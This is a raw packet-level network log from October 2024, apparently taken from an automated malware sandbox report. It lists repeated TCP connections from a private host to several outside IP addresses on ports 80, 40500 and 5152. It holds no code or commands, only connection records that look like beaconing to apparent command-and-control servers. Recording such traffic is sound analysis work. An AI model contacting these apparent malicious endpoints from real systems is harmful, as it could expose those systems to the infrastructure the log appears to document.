                                                                                                                                                                                            Oct 26, 2024 07:27:12.396449089 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396461010 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396491051 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396496058 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396508932 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396516085 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396527052 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396533966 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396563053 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396564007 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396576881 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396589041 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396594048 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.396617889 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.397870064 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.397912979 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.397959948 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.397965908 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.397979021 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.397984028 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.397989988 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398001909 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398008108 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398010969 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398020983 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398030043 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398044109 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398046017 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398052931 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398063898 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398066998 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398071051 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398077965 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398097992 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398124933 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398130894 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398137093 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398149014 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398154020 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398160934 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398175001 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398178101 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398195028 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398216009 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398643970 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398721933 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398727894 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398740053 CEST8049991185.215.113.84192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398770094 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.398792982 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.445020914 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:12.445357084 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:15.054625034 CEST4999180192.168.2.6185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:16.640976906 CEST4999640500192.168.2.694.183.35.46
                                                                                                                                                                                            Oct 26, 2024 07:27:16.646229029 CEST405004999694.183.35.46192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:16.646372080 CEST4999640500192.168.2.694.183.35.46
                                                                                                                                                                                            Oct 26, 2024 07:27:16.647768021 CEST4999640500192.168.2.694.183.35.46
                                                                                                                                                                                            Oct 26, 2024 07:27:16.653192997 CEST405004999694.183.35.46192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:16.653300047 CEST4999640500192.168.2.694.183.35.46
                                                                                                                                                                                            Oct 26, 2024 07:27:16.661500931 CEST405004999694.183.35.46192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:17.633953094 CEST4999780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:17.639444113 CEST804999791.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:17.639548063 CEST4999780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:17.809063911 CEST4999780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:17.815881968 CEST804999791.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:18.186615944 CEST405004999694.183.35.46192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:18.186827898 CEST4999640500192.168.2.694.183.35.46
                                                                                                                                                                                            Oct 26, 2024 07:27:18.565994978 CEST804999791.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:18.566078901 CEST4999780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:19.307523012 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:19.312990904 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:19.313092947 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:19.313267946 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:19.318623066 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:20.277121067 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:20.278753996 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:21.127396107 CEST4999780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:22.346453905 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:22.351831913 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:22.645297050 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:22.645556927 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:23.362258911 CEST4999640500192.168.2.694.183.35.46
                                                                                                                                                                                            Oct 26, 2024 07:27:23.367633104 CEST405004999694.183.35.46192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:24.706722021 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:24.712110996 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:24.999893904 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:25.002737045 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:27.098504066 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:27.103817940 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:27.434320927 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:27.434449911 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:28.375901937 CEST4999940500192.168.2.6198.163.192.16
                                                                                                                                                                                            Oct 26, 2024 07:27:28.381385088 CEST4050049999198.163.192.16192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:28.384758949 CEST4999940500192.168.2.6198.163.192.16
                                                                                                                                                                                            Oct 26, 2024 07:27:28.386362076 CEST4999940500192.168.2.6198.163.192.16
                                                                                                                                                                                            Oct 26, 2024 07:27:28.391705036 CEST4050049999198.163.192.16192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:28.393173933 CEST4999940500192.168.2.6198.163.192.16
                                                                                                                                                                                            Oct 26, 2024 07:27:28.398597002 CEST4050049999198.163.192.16192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:29.456048965 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:29.461522102 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:29.749228001 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:29.749284029 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:30.890415907 CEST4999940500192.168.2.6198.163.192.16
                                                                                                                                                                                            Oct 26, 2024 07:27:31.161886930 CEST4050049999198.163.192.16192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:32.908411980 CEST4999480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:32.908780098 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:32.914346933 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:32.914361000 CEST8049994185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:32.914465904 CEST4999480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:32.914479017 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:32.914791107 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:32.920058012 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848124027 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848196983 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848284960 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848318100 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848332882 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848352909 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848359108 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848387957 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848396063 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848431110 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848438978 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848474979 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848481894 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848510027 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848515034 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848539114 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848552942 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848572969 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848577976 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.848619938 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.852861881 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.852891922 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854101896 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854155064 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854176044 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854207039 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854208946 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854240894 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854249954 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854276896 CEST8050000185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854284048 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:33.854321957 CEST5000080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:35.877336025 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:35.884468079 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:35.884555101 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:35.884700060 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:35.891206026 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:35.907617092 CEST5000240500192.168.2.690.156.163.55
                                                                                                                                                                                            Oct 26, 2024 07:27:35.913156033 CEST405005000290.156.163.55192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:35.913479090 CEST5000240500192.168.2.690.156.163.55
                                                                                                                                                                                            Oct 26, 2024 07:27:35.915299892 CEST5000240500192.168.2.690.156.163.55
                                                                                                                                                                                            Oct 26, 2024 07:27:35.921906948 CEST405005000290.156.163.55192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:35.922003984 CEST5000240500192.168.2.690.156.163.55
                                                                                                                                                                                            Oct 26, 2024 07:27:35.927730083 CEST405005000290.156.163.55192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812014103 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812072039 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812073946 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812087059 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812099934 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812112093 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812114000 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812123060 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812135935 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812179089 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812194109 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812206984 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812218904 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812236071 CEST8050001185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812239885 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812268972 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.812292099 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.815747023 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.815776110 CEST5000180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:36.876151085 CEST4050049999198.163.192.16192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:36.876404047 CEST4999940500192.168.2.6198.163.192.16
                                                                                                                                                                                            Oct 26, 2024 07:27:36.936990976 CEST5000240500192.168.2.690.156.163.55
                                                                                                                                                                                            Oct 26, 2024 07:27:36.983454943 CEST405005000290.156.163.55192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:39.050873995 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:39.056230068 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:39.056299925 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:39.062304020 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:39.067935944 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.163943052 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.163960934 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.163969994 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.163997889 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164011002 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164021015 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164022923 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164038897 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164051056 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164061069 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164067984 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164076090 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164087057 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164091110 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164118052 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164140940 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164206028 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164242029 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164835930 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.164858103 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.169867992 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.169918060 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.169929981 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.169940948 CEST8050004185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:40.169950962 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.169991016 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:40.170706987 CEST5000480192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:41.949760914 CEST5000540500192.168.2.659.91.192.122
                                                                                                                                                                                            Oct 26, 2024 07:27:41.955064058 CEST405005000559.91.192.122192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:41.955154896 CEST5000540500192.168.2.659.91.192.122
                                                                                                                                                                                            Oct 26, 2024 07:27:41.958312035 CEST5000540500192.168.2.659.91.192.122
                                                                                                                                                                                            Oct 26, 2024 07:27:41.963705063 CEST405005000559.91.192.122192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:41.963752031 CEST5000540500192.168.2.659.91.192.122
                                                                                                                                                                                            Oct 26, 2024 07:27:41.969290972 CEST405005000559.91.192.122192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:42.093240023 CEST5000540500192.168.2.659.91.192.122
                                                                                                                                                                                            Oct 26, 2024 07:27:42.139482021 CEST405005000559.91.192.122192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:42.198945999 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:42.204392910 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:42.204454899 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:42.205141068 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:42.210437059 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131649017 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131679058 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131695032 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131742954 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131759882 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131778002 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131783009 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131794930 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131809950 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131809950 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131828070 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131834030 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131844997 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131860018 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131860018 CEST8050006185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:43.131936073 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:43.146040916 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:43.146064043 CEST5000680192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:44.407097101 CEST405005000290.156.163.55192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:44.409015894 CEST5000240500192.168.2.690.156.163.55
                                                                                                                                                                                            Oct 26, 2024 07:27:45.183347940 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:45.188802958 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:45.188878059 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:45.189408064 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:45.194751024 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111536026 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111578941 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111588955 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111660957 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111685991 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111696959 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111709118 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111721039 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111732960 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111745119 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111754894 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111766100 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111789942 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.111819983 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.112315893 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.112350941 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.117161989 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.117177963 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.117192030 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.117207050 CEST8050007185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.117244959 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.117280006 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.117341995 CEST5000780192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.872004032 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.877456903 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:46.878784895 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.879024982 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:46.884409904 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:47.095042944 CEST5000940500192.168.2.678.37.229.249
                                                                                                                                                                                            Oct 26, 2024 07:27:47.100481987 CEST405005000978.37.229.249192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:47.100594044 CEST5000940500192.168.2.678.37.229.249
                                                                                                                                                                                            Oct 26, 2024 07:27:47.103281975 CEST5000940500192.168.2.678.37.229.249
                                                                                                                                                                                            Oct 26, 2024 07:27:47.108742952 CEST405005000978.37.229.249192.168.2.6
